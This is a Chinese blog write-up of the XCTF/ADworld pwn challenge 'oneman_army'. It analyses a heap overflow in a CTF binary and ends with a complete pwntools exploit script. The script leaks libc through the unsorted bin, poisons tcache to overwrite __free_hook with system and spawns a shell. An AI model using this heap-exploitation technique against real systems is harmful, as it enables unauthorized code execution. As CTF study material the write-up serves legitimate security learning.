ADworld pwn wp - onemanarmy

最新推荐文章于 2023-11-22 20:01:38 发布
最新推荐文章于 2023-11-22 20:01:38 发布
阅读量175 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120083836
版权

前言

攻防世界的一道large bin,unsorted bin,tcache attack的题目(one man army, 一个人的军队, 看起来很吊)
做到后面的10分题,发现攻防世界的题目环境问题很多啊,不是高分题有多难,而是环境有问题打通了也拿不到flag,或者根本打不通(2021.9.10

不过这道题是可以顺利打通的

分析过程

在这里插入图片描述

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+Ch] [rbp-24h]
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v6; // [rsp+28h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  sub_11B5(a1, a2, a3);
  memset(s, 0, 0x10uLL);
  while ( 1 )
  {
    menu();
    read(0, s, 0xFuLL);
    v4 = atoi(s);
    if ( v4 == 4 )
      return 0LL;
    if ( v4 == 2 )
    {
      Puts();
    }
    else if ( v4 > 2 )
    {
      if ( v4 == 3 )
      {
        Free();
      }
      else if ( v4 == 9011 )
      {
        if ( !dword_4050 )
        {
          read(0, buf, 0x100uLL);
          goto LABEL_15;
        }
      }
      else
      {
LABEL_15:
        puts("Invalid option!");
      }
    }
    else
    {
      if ( v4 != 1 )
        goto LABEL_15;
      Create();
    }
  }
}

unsigned __int64 sub_1243()
{
  __int16 v0; // ax
  size_t size[3]; // [rsp+Ch] [rbp-24h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Size: ");
  read(0, (char *)size + 4, 0xFuLL);
  v0 = atoi((const char *)size + 4);
  LODWORD(size[0]) = v0 & 0x1FF;                // size
  buf = (char *)malloc(v0 & 0x1FF);
  printf("Content: ");
  read(0, buf, LODWORD(size[0]));
  puts("Done!");
  return __readfsqword(0x28u) ^ v3;
}

在这里插入图片描述

选择9011时, buf存在溢出

漏洞利用

堆溢出的问题最终都是要攻击free/malloc(_hook), 比如修改free_hook, 使其调用system, free("/bin/sh\x00")就可以实现get shell
这题给了libc, 是2.27版本, 考虑tcache机制, 反而是tcache比fastbin更容易利用
思路:
申请两个连续的chunk, 释放第二个, 用堆溢出修改第二个chunk的size为large chunk, 再申请回来再释放就会放入unsorted bin, 接着从unsorted bin中切割出一个0x30的chunk, unsorted bin的头指针会往后指0x30偏移, 再申请一个0x40的chunk, 就可以拿到main_arena的地址, show()泄露出来, 这里需要将低3位抹平, 因为ASLR是按0x1000对齐的, 所以不用考虑第三位的偏移, 然后低3位加上hook在libc的地址即可拿到实际的hook地址

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

接下来就是继续chunk溢出, 修改tcache_next指针指向free_hook, 再修改free_hook指向system, 再给buf覆盖成"/bin/sh\x00", 最后delete就完事

exp

from os import system
from pwn import *

url, port = "111.200.241.244", 60081
filename = "./oneman_army"
elf = ELF(filename)
libc = ELF("./libc-2.27.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def BK():
    gdb.attach(io)
    pause()

def create(size,content):
   io.sendlineafter('Your choice:', '1')
   io.sendlineafter('Size:', str(size))
   io.sendafter('Content:', content)
 
def show():
   io.sendlineafter('Your choice:', '2')
 
def delete():
   io.sendlineafter('Your choice:', '3')

def edit(content):
   io.sendlineafter('Your choice:', '9011')
   io.send(content)

def pwn():
    malloc_hook_libc = libc.sym["__malloc_hook"]
    free_hook_libc = libc.sym["__free_hook"]
    system_libc = libc.sym["system"]

    for i in range(1, 0x10):
        create(i * 0x10, "ZZZZ")
        delete()

    create(0x10, "Z")
    payload = cyclic(0x10) + p64(0) + p64(0x4b1)
    edit(payload)
    delete()

    create(0x20, "Z")
    delete()

    create(0x20, "Z")
    create(0x30, "Z")
    show()
    io.recv(1)
    main_arena_addr = u64(io.recvuntil("\n", drop = True).ljust(8, b"\x00"))
    libc_base = (main_arena_addr & 0xFFFFFFFFFFFFF000) + (malloc_hook_libc & 0xFFF) - malloc_hook_libc
    free_hook_addr = free_hook_libc + libc_base
    system_addr = system_libc + libc_base
    log.info("libc base address: %#x" % libc_base)
    log.info("free hook address: %#x" % free_hook_addr)
    log.info("system address: %#x" % system_addr)

    payload = cyclic(0x30) + p64(0) + p64(0x50) + p64(free_hook_addr)
    edit(payload)
    create(0x40, "ZZZZ")
    create(0x40, p64(system_addr))
    create(0x50, b"/bin/sh\x00")
    delete()

    io.interactive()

if __name__ == "__main__":
    pwn()

总结

难点

(1) 构造tcache 0x40链第一个chunk和unsorted bin的第一个chunk重合
这是一个比较复杂的点, 一开始不理解泄露libc的手法, 但是通过调试观察内存数据理解了.
其实本质都是通过unsorted bin的main_arena泄露libc, 不过问题在于怎么拿到第一个unsorted bin的chunk, 因为有tcache机制, 又有堆溢出, 所以可以通过修改下一个邻近的chunk头size改成large chunk, 丢进unsorted bin中, 接下来是问题的关键, 因为这里是修改0x30chunk到unsorted bin中, 实际内存中是0x30和0x40chunk邻接, 所以把large chunk切割出一个0x30后, unsorted bin中的第一个chunk就是剩下的部分, 而这个chunk头刚好就是tcache中0x40chunk的头, 所以再申请出tcache中的0x40chunk就拿到了unsorted bin第一个chunk的数据, fd指针就是指向main_arena
(实在看不懂的可以一行行调试观察heap和bin

卡点

(1) 老毛病了, 犯低级错误, 64位系统地址一共写成16位16进制
0xFFFFFFFFFFFFF000
而不是8位
0xFFFFF000

参考

https://blog.csdn.net/seaaseesa/article/details/104241011

https://blog.csdn.net/abel_big_xu/article/details/111145399

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SUCTF 2019] SignIn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 4177
[SUCTF 2019] SignIn 如果对本文存在有疑问或需要工具可以在下方给我留言! 这题比较简单 题目下载地址:https://www.lanzous.com/iawzl2f 程序没有加壳,直接IDA载入 直接分析main函数,我们可以看到程序的逻辑很清晰。 使用GDB调试得知sub_96A函数是把用户输入的字符串转换为16进制存入v9中。 继续往下看,程序调用了 __gmpz_...
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
攻防世界PWN之oneman_army题解
seaaseesa的博客
02-09 887
oneman_army 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,9011功能可以溢出 最大申请0x1FF大小的堆,申请次数没有限制 Delete功能没有把指针清空 本题,已知libc为2.27,所以存在tcache bin机制,可以很容易利用。我们肯定是要攻击free_hook或者malloc_hook,那么首先需要泄露地址,而泄露地址,需要利用unso...
IDA Pro plug-in defines
weixin_33724059的博客
09-18 349
/* This file contains definitions used by the Hex-Rays decompiler output. It has type definitions and convenience macros to make the output more readable. Copyright (c) 2007-2011...
LOWORD和HIWORD函数
哼哼唧唧
11-29 5455
最近在做逆向分析题目的时候通过IDA反编译的源码中出现了两个没见过的函数,LOWORD和HIWORD函数,在网上查找了一会儿,感觉都不太全面,下面是对于这两个函数的一点总结和体会。例如对于十六进制数0xCCDDEEFF,那么HIWORD(0xCCDDEEFF)得到的结果就是oxCCDD,正好是一个word值.同理LOWORD(0XCCDDEEFF)返回的结果就是0xEEFF,也正好是一个word值.需要注意的是这是32位中的宏,取的值为word两字节,如果需要64位的,使用的宏为。
攻防世界PWN之valet!题解
seaaseesa的博客
02-09 205
Valet! 简单的栈溢出 #coding:utf8 from pwn import * #sh = remote('111.198.29.45',43798) sh = remote('127.0.0.1',101010) def guess(): sh.sendlineafter('3. Quit','1') #溢出,覆盖s payload = 'aaa\x00a...
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
CTF学习笔记 Reverse篇(1) BUUCTF-re-[GWCTF 2019]xxor
哼哼唧唧
11-28 618
2、这里dword_601078是取了每个v6元素四个字节中的后两个字节中的值,dword_60107c则是取了每个v6元素四个字节中前两个字节的值,这里解释一下为什么dword——601078那一条语句没有lodword函数却依然和有lodword函数的结果相同,这是由于dword_601078这个变量只能存储2个字节的数据,因此在读取v6[j]时只能读取其前两个字节,效果其实就跟lodword一样。小白的第一次尝试逆向题目,以后也会在有余力的情况下坚持写笔记,不足之处希望各位大佬指出,共同进步~
[GWCTF 2019] xxor 笔记与思考
Tokameine的博客
05-12 675
对我这种新手来说算是比较怪异的一题了,故此记录一下过程。 解题过程: 直接放入IDA,并找到main函数,得到如下代码(看了一些其他师傅的WP,发现我们的IDA分析结果各不相同,最明显的就是HIDOWRD和LODWORD函数,该差异将在下文分析) __int64 __fastcall main(int a1, char **a2, char **a3) { int i; // [rsp+8h] [rbp-68h] int j; // [rsp+Ch] [rbp-64h] _...
2018上海市大学生网络安全大赛 逆向 cpp
snowleopard_bin的博客
11-06 850
一道简单的逆向,就是两个函数加密,反着来一遍就行,不用爆破。   for ( i = 0; ; ++i ) { LODWORD(v1) = std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::length(a1); if ( i &g...
随机函数 创建随机目录
jiweihong的专栏
11-25 517
nss3.dll 地址 100010C0  signed __int64 __cdecl PR_Now() {   signed __int64 v0; // ST00_8@1   int v2; // [sp+0h] [bp-20h]@1   struct _FILETIME FileTime; // [sp+4h] [bp-1Ch]@1   struct _SYSTEMTIME S
2023 第七届 HECTF 信息安全挑战赛signin
最新发布
dangwobucunzai的博客
11-22 132
本题主要是要让程序执行到b4ckdo0r函数,但是需要在函数中满足输入的数值大于3和等于0x42此题关键点在LODWORD(v4[0]),主要是LODWORD(**是一个在编程中用来从更大的整数类型中提取低位部分(低阶双字)的宏或函数。通常用于从 64 位整数(如或)中提取低 32 位,以得到一个(即)类型的值。),我们输入的是64位的数据,比对需要小于3的时候使用的是64位的数据,但是在比对是否位0x42时,使用的是低32位的数据。
初识webpack之loader的作用
kgjfk的博客
02-23 407
什么是loader? 前面有讲到,webpack是一个模块打包工具,它可以打包任何以模块方式引入的文件,而webpack实际上默认情况下它还是只能识别js文件,而要打包其它类型的文件,此时就需要我们在webpack.config.js配置文件中对需要打包的文件进行配置。只有配置之后,当我们的webpack在打包非js文件时,它才会去看配置文件中是怎么配置的,然后按照我们的配置进行打包,而配置打包规则时就需要用到我们的loader。配置非js打包规则如下: 从图中我们可以看到,在这个配置文件中,我们不止配置了
IDA使用教程 快速找到伪代码中变量所在的内存区域
m0_43406494的博客
10-16 5414
如要找到v4所在的数据区域,光标定位到一条引用了v4的代码,如上 LODWORD(v4) = 0;,Tab键跳到对应的IDA-view窗口 还可以右键打开新窗口
BUUCTF[GWCTF 2019]xxor学习笔记
a5555678744的博客
03-03 1841
总体结构: 首先找到main函数,结构很清晰 前半段是输入和初始化 后半段开始着手加密 最后给出相应的输出 逐步分析: 首先在liunx中运行程序(注意要使用64位版本的liunx系统,后缀是AMD64的那种) 由题目给的这些字串可以得知,我们要输入六个数据来玩一个猜数游戏 这六个数据仔细分析就会发现就是v6,v6的每个元素占据4个字节 然后跟踪v6的行踪,仔细分析与v6有关的加密代码 这里dword_601078是取了每个v6元素四个字节中的后两个字..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值